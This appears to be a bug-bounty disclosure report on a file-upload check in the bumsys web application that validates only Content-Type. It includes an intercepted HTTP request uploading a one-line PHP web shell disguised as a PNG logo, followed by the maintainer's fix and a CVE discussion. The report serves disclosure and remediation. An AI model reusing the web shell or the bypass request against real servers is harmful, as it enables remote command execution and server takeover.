File Upload Type Validation Error in unilogies/bumsys

Valid

Reported on

Jan 19th 2023


Description

The application does not properly validate the file type or extension during the upload process, allowing any authenticated user to bypass it .

Steps_TO_Reproduce

- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request  and do the below changes .

Proof of Concept

- Since the Application allow only jpeg, jpg, png image type to upload.
- So The Following request was modified to allow uploading php file to bypass the check , Since the Application is only validating the Content-type not the extension of the file.

Burpsuite-Request

POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

 test 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

 
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

Burpsuite-Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

VIDEO_POC

https://drive.google.com/drive/folders/1FjCIRSSimDherYajo1X8Sm-8voDBkITH?usp=sharing

Impact

Since the application is not properly validating the file extension and a PHP file is uploaded, it could potentially allow an attacker to execute arbitrary code on the server.

References

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 2 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 2 months ago
Khurshid Alam validated this vulnerability 2 months ago
ctflearner has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam
2 months ago

Maintainer


@ctflearner, Thank you so much for the report. It is really admirable work.

By the way, Is there any virus on that PHP file? I do not think so, but my system is detecting as a virus.!

Looking forward to hearing from you.

Khurshid Alam
2 months ago

Maintainer


So, should I validate file extension instead of file type or both? What would be the best solution for this? Thanks.

ctflearner
2 months ago

Researcher


@khurshid Alam , talking about the PHP file, it doesn't contain virus

ctflearner
2 months ago

Researcher


Talking about the validation , you should implement both

Khurshid Alam
2 months ago

Maintainer


@ctflearner, I have updated the issue on https://demo.bumsys.org/. Could you please confirm is it fixed or not? So, I can update the repo.

Thank you.

ctflearner
2 months ago

Researcher


@khurshid Alam , The above issue is fixed but you have to to implement one extra thing " Obfuscating file extensions" here is the Link to a Resources " https://portswigger.net/web-security/file-upload" that you can look into it and fix the issue

ctflearner
2 months ago

Researcher


@ khurshid Alam . I would be glad if you could assign a CVE for this

Khurshid Alam
2 months ago

Maintainer


@ctflearner, Thank you for confirming. Let me heck the article.

Khurshid Alam
2 months ago

Maintainer


I Think Obfuscating file extensions is not applicable here. Could please check code and let me know if it is okay?

function.php L1468

config.php L62

ctflearner
2 months ago

Researcher


Yes, It is okay , kindly look into my request for CVE for this

Khurshid Alam
2 months ago

Maintainer


Ok, How do I do that?

ctflearner
2 months ago

Researcher


You can contact the huntr-dev for CVE related issue from your ends , I cannot do anything from myside , check the policy( https://huntr.dev/policy/ ) or mail them how to assign CVE . Thanks

ctflearner
2 months ago

Researcher


I think in this platform Your CVE category is set to "NO" , if you could change from "NO " to "yes", I mean " CVE : YES " then it will be easy for you to assign CVE to a researcher

ctflearner
2 months ago

Researcher


You can Refer to this Website: https://www.cve.org/PartnerInformation/ListofPartners/partner/@huntrdev and please let me know if you have any issue or query

ctflearner
2 months ago

Researcher


And if you want to see the Reference of the CVE Report you can visit the below link https://nvd.nist.gov/vuln/detail/CVE-2022-4506

Khurshid Alam marked this as fixed in v1.0.3-beta with commit a5beff 2 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 2 months ago
Khurshid Alam
2 months ago

Maintainer


@admin, please assign a CVE. thanks!

Ben Harvie
2 months ago

Admin


CVE assigned as requested:)

Khurshid Alam
2 months ago

Maintainer


Thank you.

to join this conversation